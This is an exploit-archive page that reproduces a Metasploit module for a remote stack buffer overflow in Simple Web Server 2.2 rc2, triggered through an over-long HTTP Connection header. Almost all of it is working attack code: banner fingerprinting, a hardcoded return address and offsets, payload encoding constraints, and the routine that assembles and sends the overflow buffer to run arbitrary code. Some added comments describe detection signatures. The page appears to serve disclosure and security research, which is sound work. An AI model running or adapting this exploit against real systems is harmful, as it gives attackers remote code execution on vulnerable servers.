Simple Web Server Connection Header Buffer Overflow

2012.07.24
Credit: juan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

# Exploit module for a stack-based buffer overflow (CWE-119) in Simple Web
# Server 2.2 rc2: the server passes an over-long HTTP `Connection` request
# header through vsprintf() into a fixed-size stack buffer (see Description).
# From a defender's view the observable is a single GET whose Connection
# header is several kilobytes of mostly random bytes against a server whose
# banner matches `PMSoftware-SWS`.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  # Banner pattern the framework uses to pre-filter HTTP targets before
  # check/exploit run; only hosts advertising this Server header qualify.
  HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata: payload constraints, the single target's
  # return address and buffer offsets, and references to the original advisory.
  #
  # @param info [Hash] module info passed in by the framework
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Simple Web Server Connection Header Buffer Overflow",
      'Description'    => %q{ This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to causes an overflow on the stack when function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3. },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr.pr0n', # Vulnerability Discovery and PoC
          'juan' # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '19937'],
          ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
        ],
      'Payload'        =>
        {
          # NUL, LF and CR are excluded — presumably because they would end
          # the C string or the header line before the whole buffer is copied.
          'BadChars' => "\x00\x0a\x0d",
          # 'Space' equals the target 'Offset' below: exploit() relies on the
          # encoded payload fitting in the first Offset bytes of the buffer.
          'Space' => 2048,
          'DisableNops' => true,
          # Stack-pointer adjustment prepended before the encoded payload;
          # presumably keeps the payload's own pushes clear of the buffer.
          'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll
              'Offset' => 2048,   # bytes from buffer start to the saved return address
              'OffsetEDI' => 84   # bytes between the return address and where EDI points
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 20 2012",
      'DefaultTarget'  => 0))
  end

  # Fingerprints the target by fetching "/" and inspecting the Server header.
  # The regex is unanchored and matches version strings beginning 2.0, 2.1
  # or 2.2 (a hypothetical 2.20 would also match), so treat Vulnerable as a
  # banner-based indication rather than proof.
  #
  # NOTE(review): `and` binds looser than `=~`; the conjunction works here only
  # because it is the whole `if` condition — `&&` is the conventional form.
  #
  # @return [Exploit::CheckCode] Vulnerable on a matching banner, Safe otherwise
  def check
    res = send_request_raw({'uri'=>'/'})
    if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  # Builds the over-long Connection header value and sends it in one GET.
  # Layout, as constructed below:
  #   [encoded payload][random fill up to Offset][Ret, little-endian]
  #   [OffsetEDI random bytes][short relative jmp back to the buffer start]
  # The total is Offset + 4 + OffsetEDI + jmp bytes (> 2 KB) of a single
  # request-header value — the size alone is a usable detection signature.
  def exploit
    sploit = payload.encoded
    # Negative length here would mean the payload exceeded Offset; the
    # 'Space' => 2048 payload constraint is what prevents that.
    sploit << rand_text(target['Offset'] - sploit.length)
    sploit << [target.ret].pack("V") # eip
    sploit << rand_text(target['OffsetEDI'])
    # `$` is the current position in Metasm syntax, so this jumps back by the
    # length of everything assembled so far, i.e. to the start of the buffer.
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string
    print_status("Trying target #{target.name}...")
    connect
    send_request_cgi({
      'uri' => '/',
      'version' => '1.1',
      'method' => 'GET',
      'connection' => sploit
    })
    disconnect
  end
end

References:

http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/

